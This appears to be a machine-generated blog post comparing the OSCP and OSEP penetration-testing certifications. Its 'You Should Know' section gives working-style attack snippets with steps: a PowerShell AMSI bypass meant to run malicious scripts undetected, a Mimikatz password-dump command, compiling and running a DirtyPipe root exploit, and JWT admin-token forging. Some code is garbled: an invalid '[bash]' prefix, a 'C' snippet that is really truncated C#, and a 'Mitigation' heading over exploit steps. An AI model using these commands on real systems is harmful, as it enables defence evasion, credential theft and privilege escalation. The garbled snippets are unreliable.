Listen to this Post

Introduction
The Offensive Security Certified Professional (OSCP) and Offensive Security Experienced Penetration Tester (OSEP) certifications are two of the most sought-after credentials in cybersecurity. While OSCP is known for its hands-on penetration testing approach, OSEP focuses on advanced evasion techniques and offensive security tactics. Recent discussions among professionals, including Tyler Ramsbey’s critical yet constructive feedback, highlight the evolving nature of these courses.
Learning Objectives
- Understand the key differences between OSCP and OSEP.
- Learn essential evasion and exploitation techniques from OSEP.
- Explore real-world applications of OffSec’s training in red teaming.
You Should Know
1. Bypassing AMSI with PowerShell
Command:
[bash].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Step-by-Step Guide:
This PowerShell snippet disables the Anti-Malware Scan Interface (AMSI), a common defense mechanism in Windows.
1. Open PowerShell as administrator.
2. Paste the command to disable AMSI temporarily.
3. Execute malicious scripts without AMSI detection.
Note: Modern EDR solutions may flag this, so use obfuscation techniques.
2. PrintSpoofer Privilege Escalation (C Rewrite)
Code Snippet:
// C implementation of PrintSpoofer (abusing SeImpersonatePrivilege) using System; using System.Diagnostics; ...
Step-by-Step Guide:
1. Compile the C code into an executable.
- Run on a compromised Windows host with
SeImpersonatePrivilege.
3. Spawn a SYSTEM-level shell.
OSEP’s course provides deep dives into such privilege escalation techniques.
3. Evading EDR with Reflective DLL Injection
Command:
mimikatz.exe "sekurlsa::logonpasswords" /patch
Step-by-Step Guide:
- Use a custom loader to reflectively inject Mimikatz into memory.
2. Bypass signature-based detection by avoiding disk writes.
3. Extract credentials without triggering EDR alerts.
4. Linux Kernel Exploit (DirtyPipe Mitigation)
Command:
gcc dirtypipe.c -o exploit && ./exploit
Step-by-Step Guide:
1. Identify vulnerable kernels (Linux 5.8+).
- Compile and execute the exploit to gain root.
3. Patch systems by upgrading the kernel.
5. API Security: JWT Token Manipulation
Command:
python3 jwt_tool.py <JWT_TOKEN> -T
Step-by-Step Guide:
- Capture a JWT token from a web app.
- Use `jwt_tool` to test for weak algorithms or brute-force secrets.
3. Forge admin tokens to escalate privileges.
What Undercode Say
- Key Takeaway 1: OSEP’s updated content (as of 2024) addresses past criticisms, offering more practical evasion labs.
- Key Takeaway 2: OSCP remains foundational, but OSEP is better suited for advanced red teamers.
Analysis:
OffSec’s willingness to engage with critics like Tyler Ramsbey signals a shift toward transparency. The OSEP course now includes newer modules on .NET offensive security, API hacking, and cloud penetration testing—topics highly relevant in 2025. However, the high cost remains a barrier, pushing some toward alternatives like CPTS (Certified Penetration Testing Specialist).
Prediction
As AI-driven security tools evolve, OffSec may integrate automated exploit generation and AI-assisted red teaming into future courses. Expect more focus on cloud-native attacks and serverless exploitation in upcoming certifications.
For hands-on learners, following Ramsbey’s YouTube journey (link) will provide real-time insights into OSEP’s effectiveness.
Would you pursue OSEP over OSCP? Share your thoughts in the comments.
IT/Security Reporter URL:
Reported By: Tyler Ramsbey – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


